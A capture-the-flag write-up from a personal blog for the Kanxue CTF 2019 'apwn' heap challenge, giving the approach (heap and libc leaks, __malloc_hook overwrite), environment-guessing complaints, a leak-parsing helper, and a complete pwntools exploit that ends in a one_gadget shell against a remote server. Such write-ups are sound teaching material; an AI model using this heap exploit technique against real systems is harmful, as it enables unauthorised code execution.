Kanxuectf_2019_apwn

The apwn setup was quite interesting.

start

Not much to say about the challenge itself... an arbitrary-address write,
plus a leak.

Approach

Leak heap and libc addresses & overwrite __malloc_hook.

Pitfalls.

10 minutes on the challenge, 5 hours on the environment.
Not sure whether they deliberately withheld the libc to pad out solve times. No libc was given, and it turned out to be 2.27... I was completely baffled. Then my Ubuntu 18 also differed slightly from the server: on mine there is a 0x410 tcache chunk at init, so the whole solve was done by imagination...

Absolutely brutal. The challenge itself was done in about half an hour, but to guess the environment I tried Ubuntu 14, 16, Kali, and 18... some boxes didn't even have docker; fiddled with it for 3 or 4 hours...
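Added example (my own code, not from the writeup): the leak-to-base arithmetic the exp relies on, together with the page-alignment sanity check that flags a wrong libc guess immediately instead of after hours of environment hunting. The sample response bytes and the "wrong" offset are constructed; the 2.27 offset is the one used in the exp below.

```python
import struct

PAGE = 0x1000

def parse_leak(raw, sentinel=b"1"):
    """Unpack a little-endian pointer the binary echoed raw.

    Same idiom as the exp: read up to the sentinel that follows the pointer,
    drop it, zero-pad to 8 bytes (a user-space pointer has 6 significant
    bytes). Caveat: if a pointer byte happens to equal the sentinel the leak
    is truncated, so the length is checked rather than trusted.
    """
    body = raw.split(sentinel, 1)[0]
    if not 1 <= len(body) <= 8:
        raise ValueError("leak length %d outside 1..8 bytes" % len(body))
    return struct.unpack("<Q", body.ljust(8, b"\x00"))[0]

def offset_is_plausible(leaked_ptr, offset_in_libc):
    """True when subtracting the guessed offset yields a page-aligned base.

    libc is mmap'ed page-aligned, so a misaligned result proves the offset
    (i.e. the guessed libc build) is wrong before anything is written.
    """
    return ((leaked_ptr - offset_in_libc) & (PAGE - 1)) == 0

def libc_base_from_leak(leaked_ptr, offset_in_libc):
    """Derive the libc base, refusing an offset that cannot be right."""
    if not offset_is_plausible(leaked_ptr, offset_in_libc):
        raise ValueError("base not page-aligned: libc offset/version guess is wrong")
    return leaked_ptr - offset_in_libc

# Constructed sample of what follows "name: " on the wire:
# 6 raw pointer bytes (0x7fce69891090) and then the menu line starting with "1".
SAMPLE_LEAK = b"\x90\x10\x89\x69\xce\x7f" + b"1\n"
# Offset of the leaked pointer inside libc-2.27, as computed in the exp.
LEAK_OFFSET_2_27 = 0x7fce69891090 - 0x7fce694a5000   # 0x3ec090
# Constructed offset standing in for a wrong libc guess.
WRONG_OFFSET = 0x3c4b78

def demo():
    ptr = parse_leak(SAMPLE_LEAK)
    base = libc_base_from_leak(ptr, LEAK_OFFSET_2_27)
    return ptr, base

if __name__ == "__main__":
    ptr, base = demo()
    print("leak 0x%x -> libc base 0x%x" % (ptr, base))
    print("wrong-offset guess plausible? %s" % offset_is_plausible(ptr, WRONG_OFFSET))
```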

exp

```python
from pwn import *

# Menu helpers; prompts are matched verbatim. Byte strings and // keep this
# working under both Python 2 and Python 3 pwntools.
def cmd(c):
    p.sendlineafter(b">>\n", str(c))

def add_1(name=p64(0x21)*4):          # option 1: allocate a "single" object
    cmd(1)
    p.sendafter(b"Name:\n", name)

def add_2(name=b"YY"):                # option 2: allocate a "lucky" object (two names)
    cmd(2)
    p.sendafter(b"Name\n", b"YY")
    p.sendafter(b"name\n", name)

def edit_1(idx, name):                # option 3: edit single object idx
    cmd(3)
    p.sendlineafter(b"which?\n", str(idx))
    p.sendafter(b"luck.\n", name)

def edit_2(idx, name, pname):         # option 4: edit lucky object idx
    cmd(4)
    p.sendlineafter(b"which?\n", str(idx))
    p.sendafter(b"name?\n", name)
    p.sendafter(b"name\n", pname)

def free():                           # option 5
    cmd(5)

libc = ELF("./libc-2.27.so")
#libc = ELF("./apwn").libc
#p = process("./apwn")
p = remote("211.159.175.39", 8686)
#p = remote("127.0.0.1", 1026)

add_1()  # 0
add_2()
# single array at 0x202060, lucky array at 0x2022e0 (offsets at the bottom):
# index (0x2e0-0x60)//8 == 80 of the single array is the first lucky pointer.
# Overwrite its low byte to point 0x60 bytes back, then read the heap address.
edit_1((0x2e0-0x60)//8, b'\x60')
p.readuntil(b"name: ")
heap = u64(p.readuntil(b"1")[:-1].ljust(8, b'\x00')) - 0x60  #&0xfffffffffffff000
log.warning(hex(heap))

# Forge a chunk header (size 0x431, larger than tcache range) and point the
# lucky pointer at it.
edit_2(0, b"YY", p64(0) + p64(0x431))
edit_1((0x2e0-0x60)//8, p64(heap+0x70))

for x in range(60):
    add_1()  # 1

free()
add_1(b"\n")

# Entry 60 now overlaps the freed chunk; overwrite 8 bytes and read the libc
# pointer that follows them.
edit_1(60, b"AAAAAAAA")

p.readuntil(b"name: AAAAAAAA")
# Offset of the leaked pointer inside libc-2.27, taken from a local run.
base = u64(p.readuntil(b"1")[:-1].ljust(8, b'\x00')) - (0x7fce69891090-0x7fce694a5000)
libc.address = base
log.warning(hex(base))

# Redirect a lucky pointer to __malloc_hook and write the one_gadget address.
add_2()  # 1
edit_1((0x2e0-0x60)//8, p64(heap+0xa0))
edit_2(0, b"YY", p64(libc.symbols['__malloc_hook']))
one = 0x10a38c
edit_2(1, b"YY", p64(one+base))

cmd(1)   # trigger malloc -> __malloc_hook
# now 0
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:

'''

p.interactive()

#single 0x000000000202060+0x0000555555554000
#lucky 00000000002022E0
```
Author: n132!
Link: https://n132.github.io/2019/04/10/2019-04-10-Kanxuectf-2019-apwn/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.